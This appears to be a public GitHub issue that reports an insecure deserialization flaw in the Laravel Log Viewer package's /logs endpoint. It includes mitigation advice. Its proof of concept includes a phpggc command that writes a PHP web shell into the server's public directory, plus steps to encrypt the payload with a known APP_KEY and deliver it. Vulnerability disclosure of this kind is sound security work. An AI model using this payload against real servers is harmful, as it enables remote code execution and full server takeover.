[0day] Insecure Deserialization in Laravel Log Viewer leading to RCE #310
Description
📛 Insecure Deserialization in Laravel Log Viewer leading to RCE
Summary
An Insecure Deserialization vulnerability exists in the Laravel Log Viewer package, specifically at the endpoint GET /logs, via the dl and l parameters. These parameters are encrypted using the application's APP_KEY and then decrypted and deserialized without any validation or safety checks.
If an attacker knows the APP_KEY, they can craft a malicious payload containing a deserialization gadget chain to achieve Remote Code Execution (RCE) on the server.
🔥 Impact
- Remote Code Execution (RCE): A successful exploit allows an attacker to execute arbitrary PHP code on the server.
- Full Server Compromise: The attacker may be able to read/write arbitrary files, access sensitive data (e.g., database credentials), and gain complete control over the server.
🧪 Exploitation Details
- Endpoint:
GET /logs - Vulnerable Parameters:
dl,l - Requirements:
- Attacker must know the
APP_KEYof the Laravel application. - No authentication required — this vulnerability can be exploited by unauthenticated attackers.
- Attacker must know the
🛠️ Proof of Concept (PoC)
Using phpggc, an attacker can generate a serialized Laravel gadget chain for RCE:
./phpggc Laravel/RCE19 "echo '<?php system(\$_GET[\"vcstest88353534\"])?>' > /var/www/html/public/vcstest_928747242.php" | base64 -w 0
Using https://github.com/synacktiv/laravel-crypto-killer encrypt the payload with the known APP_KEY:
and sent to the server in the dl or l parameter to trigger code execution.
💡 Suggested Mitigation
- Avoid directly deserializing user-supplied input, even if encrypted.
- Implement a strict allow-list of expected object types before deserialization.
- Consider replacing serialization with safer data formats like JSON for user-controlled input.
If you prefer to receive more detailed information through a private channel, please let me know.